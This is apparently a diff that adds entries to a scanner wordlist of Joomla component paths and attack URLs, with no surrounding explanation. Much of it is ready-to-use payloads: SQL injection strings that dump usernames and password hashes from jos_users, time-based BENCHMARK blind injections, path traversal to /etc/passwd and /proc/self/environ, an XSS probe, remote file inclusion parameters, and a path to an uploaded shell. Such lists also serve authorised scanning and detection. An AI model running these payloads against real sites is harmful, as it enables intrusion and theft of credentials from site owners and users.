+components/com_poll/
+components/com_pollxt/
+components/com_ponygallery/
+components/com_portafolio/
+components/com_portfol/
+components/com_prayercenter/
+components/com_pro_desk/
+components/com_prod/
+components/com_productshowcase/
+components/com_profiler/
+components/com_projectfork/
+components/com_propertylab/
+components/com_puarcade/
+components/com_publication/
+components/com_quiz/
+components/com_rapidrecipe/
+components/com_rdautos/
+components/com_realestatemanager/
+components/com_recly/
+components/com_referenzen/
+components/com_rekry/
+components/com_remository/admin.remository.php
+components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/processor/reporter.sql.php
+components/com_resman/
+components/com_restaurante/
+components/com_ricette/
+components/com_rsfiles/
+components/com_rsgallery/
+components/com_rsgallery2/
+components/com_rss/
+components/com_rssreader/
+components/com_rssxt/
+components/com_rwcards/
+components/com_school/
+components/com_search/
+components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_securityimages/
+components/com_sef/
+components/com_seminar/
+components/com_serverstat/install.serverstat.php
+components/com_sg/
+components/com_simple_review/
+components/com_simpleboard/
+components/com_simplefaq/
+components/com_simpleshop/
+components/com_sitemap/sitemap.xml.php
+components/com_slideshow/
+components/com_smf/
+components/com_smf/smf.php
+components/com_swmenupro/
+components/com_team/
+components/com_tech_article/
+components/com_thopper/
+components/com_thyme/
+components/com_tickets/
+components/com_tophotelmodule/
+components/com_tour_toto/
+components/com_trade/
+components/com_uhp/
+components/com_uhp2/
+components/com_user/controller.php
+components/com_users/
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
+components/com_vehiclemanager/
+components/com_versioning /
+components/com_videodb/core/videodb.class.xml.php
+components/com_virtuemart/
+components/com_volunteer/
+components/com_vr/
+components/com_waticketsystem/
+components/com_webhosting/
+components/com_weblinks/
+components/com_webring/
+components/com_wmtgallery/
+components/com_wmtportfolio/
+components/com_x-shop/
+components/com_xevidmegahd/
+components/com_xewebtv/
+components/com_xfaq/
+components/com_xgallery/helpers/img.php?file=
+components/com_xsstream-dm/
+components/com_ynews/
+components/com_yvcomment/
+components/com_zoom/classes/
+components/mod_letterman/
+components/remository/
+eXtplorer/
+easyblog/entry/uncategorized
+extplorer/
+components/com_mtree/img/listings/o/{id}.php where {id}
+includes/joomla.php
+index.php/404'
+index.php/?option=com_question&catID=21' and+1=0 union all
+index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
+index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
+index.php?option=com_aardvertiser&cat_name=conf&task=<=
+index.php?option=com_aardvertiser&task=
+index.php?option=com_abc&view=abc&letter=AS&sectionid='
+index.php?option=com_advert&id=36'
+index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
+index.php?option=com_alfurqan15x&action=viewayat&surano=
+index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
+index.php?option=com_annonces&view=edit&Itemid=1
+index.php?option=com_articleman&task=new
+index.php?option=com_bbs&bid=-1
+index.php?option=com_beamospetition&startpage=3&pet=-
+index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
+index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
+index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
+index.php?option=com_chronoconnectivity&itemid=1
+index.php?option=com_chronocontact&itemid=1
+index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
+index.php?option=com_clantools&squad=1+
+index.php?option=com_clantools&task=clanwar&showgame=1+
+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
+index.php?option=com_commedia&task=page&commpid=21
+index.php?option=com_connect&view=connect&controller=
+index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
+index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_dioneformwizard&controller=[LFI]%00
+index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
+index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
+index.php?option=com_easyfaq&Itemid=1&task=view&gid=
+index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
+index.php?option=com_easyfaq&task=view&contact_id=
+index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
+index.php?option=com_equipment&task=components&id=45&sec_men_id=
+index.php?option=com_equipment&view=details&id=
+index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
+index.php?option=com_etree&view=displays&layout=category&id=[SQL]
+index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
+/components/com_simpleboard/file_upload.php?sbp=shell
+/components/com_hashcash/server.php?mosConfig_absolute_path=shell
+/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
+/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
+/components/com_performs/performs.php?mosConfig_absolute_path=shell
+/components/com_forum/download.php?phpbb_root_path=
+/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
+/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
+/components/minibb/index.php?absolute_path=shell
+/components/com_smf/smf.php?mosConfig_absolute_path=
+/modules/mod_calendar.php?absolute_path=shell
+/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
+/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
+/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
+/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
+/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
+/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell
+/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
+/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
+/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
+/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
+/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
+/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
+/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
+/akocomments.php?mosConfig_absolute_path=shell
+/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
+/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
+/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
+/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
+/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
+/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
+/components/com_fm/fm.install.php?lm_absolute_path=shell
+/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
+/components/com_lmo/lmo.php?mosConfig_absolute_path=shell
+/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
+/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
+/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
+/administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
+/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
+/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
+/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
+/components/com_mambowiki/ MamboLogin.php?IP=shell
+/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
+/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
+/components/com_cpg/cpg.php?mosConfig_absolute_path=shell
+/components/com_moodle/moodle.php?mosConfig_absolute_path=shell
+/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
+/components/com_mospray/scripts/admin.php?basedir=shell
+/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
+/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
+/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
+/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
+/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
+/components/com_madeira/img.php?url=shell
+/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
+/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
+/com_bsq_sitestats/external/rssfeed.php?baseDir=shell